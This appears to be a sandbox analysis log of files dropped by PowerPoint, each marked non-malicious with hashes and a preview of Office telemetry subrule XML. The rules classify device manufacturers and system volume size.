                                                                                                                              SHA-256:FDAE644926E54898717049D29AEBC3B0D5307D8465980A51494DE51566EF12D7
                                                                                                                              SHA-512:0F569BCF070AE1A19744685EEF47F4AA806AD219DD489B216D37B01390B37E40D37C470023BCA1C82CC54F3D69281F6B3297432ADDA6122A8C19288349319BE6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120664" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120663" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Parallels Software International Inc." T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):406
                                                                                                                              Entropy (8bit):4.6411784830495595
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7CZbi0rSna/Z/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdgbi0rSa/B4DspS5ndrvNO2su
                                                                                                                              MD5:883F186E839874979EBCB7B432E16F99
                                                                                                                              SHA1:F50665AF1F284A13F5308FCE336328A38A039D2C
                                                                                                                              SHA-256:4BF322ACC6BFBC1929028FA3AA7AB8BDE4F583E0E9BEB2E723B7F2E8A585D128
                                                                                                                              SHA-512:FB52ED2702F29793A6BC99487CDD1250D9810A6A63D3C5542740A950D9A6AC2F68C84A3143B8FC50C5D42DFB05B08776944A35BF94CDD930B90C890CC3C8E8CC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120665" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120663" />.. <SR T="2" R="([Pp][Ss][Ss][Cc])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):473
                                                                                                                              Entropy (8bit):4.217923487613823
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd04bi0gT/qNOm/hFsNX/c//bLMpONyuaNOjsu:2d0i8yeiWS
                                                                                                                              MD5:CEA041A87401CD8CE4DF647954F8BE8C
                                                                                                                              SHA1:D3CDC4FFB37CA85381717575681F0CB263C3D5C6
                                                                                                                              SHA-256:80C0D9EC448144FDCE9CC43D7B3563F7E5CBCF2690A2828C39577E71DAC57E5E
                                                                                                                              SHA-512:1252F6087DECBF61BBA1A3102730AFCCAF0FB8A642E64E3128CA2D6D702B883C918AE7032FAA2E0D3B13FD86B48F866EFBBA80BD59CC33269D71027C4742D69A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120666" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120665" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="PSSC Labs" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):407
                                                                                                                              Entropy (8bit):4.675144216115545
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7h4bi0g7W/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdF4bi0gC4DspS5ndrvNO2su
                                                                                                                              MD5:B822BF741576F3FC8C6C85A001530C72
                                                                                                                              SHA1:D9D9DD2E994B4D595BE34257DB9CDE87A1154427
                                                                                                                              SHA-256:3CB288E64C3D4CCA4CB43DE69E548FB395F2B810D7AEC57651DD85AD0C1C367D
                                                                                                                              SHA-512:05050EAB7DE4ED2FD89AEA419F596A1F16D801994342CF198B3097F51DEF7B70AB725912C38996BC404615FB2C84E8A959A569F6B489AE652C60C50669CCF285
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120667" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120665" />.. <SR T="2" R="^([Qq][Ee][Mm][Uu])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):468
                                                                                                                              Entropy (8bit):4.2031880617577935
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdHbi0yT/qNOm/hFsNX/c//bLMpONyu7NOjsu:2dxiyeiWv
                                                                                                                              MD5:F9B53AA50528028C466350E3B1983441
                                                                                                                              SHA1:F1115BAF42CD66A04A53CF9BEF4D8BB77B2D64CE
                                                                                                                              SHA-256:83F20F7BB71C73715ED97A7B4F82C14149739B6FBB5FE4CDF22FDAB7E92E45C8
                                                                                                                              SHA-512:2B4490F7BBA567234EA6666DE60C008F34B593DFB066B8F0F122B572BC712242C5A1C7DC2E373C30B7CDE7956980E96DD4FE868DF135FA646427FEBDC8DEF1B1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120668" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120667" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="QEMU" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):415
                                                                                                                              Entropy (8bit):4.6857727650984105
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7Ibi0yEANZT+/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdMbi0yEANZ64DspS5ndrvNO2su
                                                                                                                              MD5:ABB87A4B97F97F7392AD35C8ED191771
                                                                                                                              SHA1:B4FEEFC43EE59EA95784949E9D1CFC82A4659A21
                                                                                                                              SHA-256:F351A864EED582E9A7399AA2B04607BE46ACCB7FA7B7130D1AC06B51FA981053
                                                                                                                              SHA-512:4AACCC7764EF40F07FEA6C5F58A606F9F079D9102748A169B6EF5F8FE41671BE9CD997EE16BD62B4C2EB884A277A9B63BE7D29B7A264C084C9A276B2A014520A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120669" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120667" />.. <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):471
                                                                                                                              Entropy (8bit):4.207510286120392
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdguYbi0NST/qNOm/hFsNX/c//bLMpONyuYTY1NOjsu:2dguCwyeiWT
                                                                                                                              MD5:C7D044602693FD113B2227BFDD7C38AB
                                                                                                                              SHA1:D91E75F2970B3FD2FA8BE17DA4C5CF66846012F7
                                                                                                                              SHA-256:229004FEAB8D2FADB5B0479EDB4B028771F0B2CB602F0D5338AD0A4B5B88BF74
                                                                                                                              SHA-512:77D2CF43F55F4F1CB078096C21972EE61AB5EA181F2DA4552E0A5B0F686CED0526FB37D8236086F05BDA5FC70309D63D324C65F9CEAC8C77F5207F1CFB835A9E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120670" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120669" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Red Hat" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):431
                                                                                                                              Entropy (8bit):4.753551727724934
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd78UlNbi0NSfS+VR/qp/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdgaNbi0NSfNr/e4DspS5ndrvNO2su
                                                                                                                              MD5:8535BFB69FB3B7CFD9D8FBDAC87D554B
                                                                                                                              SHA1:C2302F7D1B7F997217AB9118E0AD3AA54C28E3E7
                                                                                                                              SHA-256:B9A1D397BC24E63060E8CBA125A36B8340A23798CBBD2C52A6A5AB156120F5CB
                                                                                                                              SHA-512:F96D22A00B452C61A78D9DA233BE16ADF9CBC7442674395DA39AC14294461D39F9ABC01457E9B67ACD5BC76A306C180D074565B301C880CD84938ADEEA2BF1C8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120671" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120669" />.. <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):474
                                                                                                                              Entropy (8bit):4.23626016395163
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdg7bi0eaNT/qNOm/hFsNX/c//bLMpONyuu+eVNOjsu:2dg9eQyeiWg
                                                                                                                              MD5:724C271FCB607628EEC70A186A603103
                                                                                                                              SHA1:BE7929E8D0541A3AEB1304F886F11C902FCED80B
                                                                                                                              SHA-256:493FC695D672D190AF88D5655B8D06422EB17B85503AADE03D6561870EF7FC78
                                                                                                                              SHA-512:1B25DD208C684D90E0EBADAC2B3C92298F786794D11BD0C8C6644E4F7192DBD0CC55526EAF6180F00D327F45EB627D1390C1CD85D3031C79F2EE9201D5ACFAB0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120672" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120671" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Supermicro" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):426
                                                                                                                              Entropy (8bit):4.745665849136667
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd78WLbi0eUlN/7WU33bNC/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdgWLbi0eaNt3pS4DspS5ndrvNO2su
                                                                                                                              MD5:D544D941DD5721A2120596DD34CD66BC
                                                                                                                              SHA1:C8EFD6A44553B5354499E1075076482E9DB4E5DE
                                                                                                                              SHA-256:D78A8AD83C8137D184D185C9B3284CCBB4AE51A7A865B17EC3258431E181E85D
                                                                                                                              SHA-512:A76AAE8D1ECD14D7A83614D2E176EFEF2069BB8BC6F8EFDF8E19AB5F82D77A5405B42C3165C3BE440D5E57183FF7BF30799A6286B6AE3B9BF89B5DC24EE78A24
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120673" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120671" />.. <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):473
                                                                                                                              Entropy (8bit):4.248875269975603
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdgRbi0eW/T/qNOm/hFsNX/c//bLMpONyuENOjsu:2dgLeWryeiWE
                                                                                                                              MD5:EEF72D3AF72D6BB233E57D2ECA4C5E67
                                                                                                                              SHA1:9E18B80D63577BA258830285EC677FCBEE8A2DDE
                                                                                                                              SHA-256:53C4747902AB67B935C8C69F47211471864CB7778368ECA3A2153115B5987B1B
                                                                                                                              SHA-512:AD250D8A8066F34B14A09136DABC50F5D00713FCBC4CA5EF2B1175F006FA82984A90E289523CECFE1582642CB416AFD40D4E762071AF16D3343A23537B5FA03A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120674" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120673" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Thinputer" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):4.732537564749622
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd78QpZbi0eW/K+fDOp/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdg2bi0eW/lrq4DspS5ndrvNO2su
                                                                                                                              MD5:A5803FCA008EBB4215D6794478260470
                                                                                                                              SHA1:5E677E1996D94573FD855D4E8FC49C76D356A3D3
                                                                                                                              SHA-256:E59E9B6E8D289B006C02A4D14370B9ED243FBD404D40725E72313D72EF2EFD39
                                                                                                                              SHA-512:5998A4265BEA6FFA2DAF861ADFA70637FE789064DE5C347666227A4CD43DA5870F42D7D7A4C6D1F68D3C506B28E48A5759E726A869D423608C231C7625614C3F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120675" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120673" />.. <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):471
                                                                                                                              Entropy (8bit):4.227442357041803
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdgfbi0e4T/qNOm/hFsNX/c//bLMpONyuhNOjsu:2dg5eUyeiWT
                                                                                                                              MD5:CD1AA78C49B0AACEDC26FEC026752B16
                                                                                                                              SHA1:618104D0FEB37645B5F10137583656D4AB430A77
                                                                                                                              SHA-256:488A6F09DEA3BEA002C89A776BC512D7B50BD1576029453BFC5410F055149EA1
                                                                                                                              SHA-512:8C8D5AE73E100D8D7D9A7ECE0D3EDF77923908E5A8331225081A79C4148D75254B67270312ABFE896F507FBD6076FDEE7CDC4044F21C9EE57CA6FFFDB441552B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120676" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120675" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="UpCloud" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):404
                                                                                                                              Entropy (8bit):4.661785998382742
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd78SlNbi0eQ/qo4UMpF/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdgSlNbi0e4qlj4DspS5ndrvNO2su
                                                                                                                              MD5:5A96DB174EACD20069A02B5407C0C808
                                                                                                                              SHA1:F63B6C071FE243A6462273299AFBCC26F3497DCA
                                                                                                                              SHA-256:71AB12643C94273B06500417B12EE7C071DB68BD0C9CCD6BF5EBCC02D8FD7B5B
                                                                                                                              SHA-512:013545F0949122842C701443655EFCEDB605A872E4B7DBC389F2DE2AFA848908FC6AD78FFDC5C1BFD541B7FAA66FF28500F80799E8C056DAC8A7087A27E29732
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120677" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120675" />.. <SR T="2" R="(^[Xx][Ee][Nn]$)">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):467
                                                                                                                              Entropy (8bit):4.197534104082195
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdg1bi0eSlNT/qNOm/hFsNX/c//bLMpONyusNOjsu:2dgXe8tyeiW4
                                                                                                                              MD5:073ABBFA23AC972DC68EB643BBE1835E
                                                                                                                              SHA1:EBE02BAA9F41ABD4AC59B1F26F931B309F051EBF
                                                                                                                              SHA-256:26F32E8DE1BEE15D714DFDF574584D100A1BAEAA57AEBB834829138AC10B441B
                                                                                                                              SHA-512:14C2CDCFDFAA5851D9C4E0DE174F11E90A6B1A262ABDDE31ACF753E714DE13796F2E2D91736CA36995ACF5B3CC236126F417A2EC0D84806AE6A3D078757C154B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120678" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120677" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Xen" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):173
                                                                                                                              Entropy (8bit):4.672551969702864
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:vFWWMNHU8LdgCcsp8cS0BHyvsdKuNFLe0H+SlAo5K55xbSJNaKqBsby:TMVBd78cLbi0eSlUOn2sby
                                                                                                                              MD5:B9512C3DF946D084BC86CCFE97B1693E
                                                                                                                              SHA1:0335928D066C9044DA7A74ADF1D86C7396BA457E
                                                                                                                              SHA-256:C1C8E4336998E5C12444902701408EB2C0CDFEBE1C0991C9F04D2F5FC44F0113
                                                                                                                              SHA-512:02E9E4A251D6DA0906599E4F31EFB020C0EB8FF4A306D8FD8848ECA37F92FA512FD83DB9770D5F0FBCF99CB78A1CEE63CB8A6749075FF04314E4967D7639129E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120679" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120677" />.. </S>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1951
                                                                                                                              Entropy (8bit):3.4239352185415433
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdlOyVfiB+tNY//OEvoYX/c///pONd+kX4OEvoYX/c///pONGD7PNWLPNm1u28:2drtcgpiP4PY2X+BLkLXAX+Ii7F
                                                                                                                              MD5:0E2FF33E08A681C369342EB32360F033
                                                                                                                              SHA1:827699C57C66DF9179D5C6EBDDEA36C4B66E1079
                                                                                                                              SHA-256:01533738732C643B5034DF2146B9686CE4F59A17DD8A8CC50A214F4E4D915E82
                                                                                                                              SHA-512:CC376375DB510C2E461D0DD801ABD8E64302E2D2A763898E958B11E3CDB5C8C3E11ED1078830FC50E2F7A00BF7218181A08BF1FE0B36734216348DB854FFD3E9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" />.. <R T="2" R="120682" />.. <F T="3">.. <O T="LT">.. <L>.. <S T="1" F="SysVolSize" M="Ignore" />.. </L>.. <R>.. <V V="500000" T="U64" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="GE">.. <L>.. <S T="1" F="SysVolSize" M="Ignore" />.. </L>.. <R>.. <V V="500000" T="U64" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false">.. <O T="COALESCE">.. <L>.. <O T="COALESCE">.. <L>.. <O T="MUL">.. <L>.. <V V="1000" T="U16" />.. </L>.. <R>.. <O T="DIV">.. <L>.. <S T="3" F="SysVolSize" />.. </L>.. <R>.. <V V="1000"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):957
                                                                                                                              Entropy (8bit):3.7910096944673426
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd6Oi0zizONlOaNe2/YFcNH/M//rLM5eNX/c//aNe2/xFcNH/M//rLM5eNpONd:2dv/VPyzTOyn4
                                                                                                                              MD5:7CB423666403BEA7A8D658FDDF5341C4
                                                                                                                              SHA1:43B1A2F4370E48C17945E88CBF7A21CA813343E6
                                                                                                                              SHA-256:CB168457A3B5FDC287A8930C717726C65BBC4F246F8EF3DDD35B3185CD30F34D
                                                                                                                              SHA-512:0FA51B0C7E4D06C7F700758F99E461D71F2B03F9BB2B5E1539D2B447479EB4D73AB72ED03A9A2D2CB3EFEDAF3DCB14BD67A462276E9EED35410F11B99BE4E34E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="120608" />.. <R T="2" R="120680" />.. <TH T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="2" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </R>.. </O>.. </TH>.. </S>.. <C T="U32" I="0" O="false">.. <S T="2" F="0" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="0" M="Ignore" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):500
                                                                                                                              Entropy (8bit):4.749671363510405
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdDO+QMfiufAVSu7PNW6Bf/0//OXNhmMNO52su:2dbQ0POPfdxD
                                                                                                                              MD5:EEA245B12A09AC27DD15649C4E555836
                                                                                                                              SHA1:CC08485C36F44D94F727C6819780F19FA378ECCF
                                                                                                                              SHA-256:A8D3913C3EE127C05D6835F2BCFDC5C8CB570C0930A320FEEDF5133A33DBBEBC
                                                                                                                              SHA-512:770EC2D85F6F5A3B3B757D5C1D80B55870F34773C7350A0C7F14F296D0559B4C379CD04ADAC10B5ED30D9A9ED4591820CAB5E1381F389E138600DCEB58FDCBC7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryStartup" />.. <R T="2" R="120100" />.. <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" />.. </S>.. <C T="W" I="0" O="false">.. <O T="COALESCE">.. <L>.. <S T="3" F="DeviceManufacturer" M="Ignore" />.. </L>.. <R>.. <V V="Other" T="W" />.. </R>.. </O>.. </C>.. <T>.. <S T="2" />.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):296
                                                                                                                              Entropy (8bit):5.2674047932916945
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7S/ck/XrhGQXulJDZSa94BDhbYlAS8lLerhB4On2sby:TMHdm/BI2qSawSCLerT4O2su
                                                                                                                              MD5:F05BB49727B8D444F7A2326340350A4A
                                                                                                                              SHA1:26C16C9982009A49002B79F76C787B5DA9A56511
                                                                                                                              SHA-256:AAA257D28A9D4D1C901AED1AC23EB9D5E33F37A5A38579B641EEE705A8E70BA0
                                                                                                                              SHA-512:DEC3DC8AC12C3995C0C86F3820BEDE48E22D40C0C6DE2B43A62C4DCE6BCD75147164727CF69B9890BBCE498B1651968A45D5939740775A129B28D0E1EF6E1D33
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="130009" V="0" DC="SM" EN="Office.Telemetry.DynamicConfigNotSet" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="depeq" />.. </S>.. <T>.. <S T="1" />.. </T>..</R>..
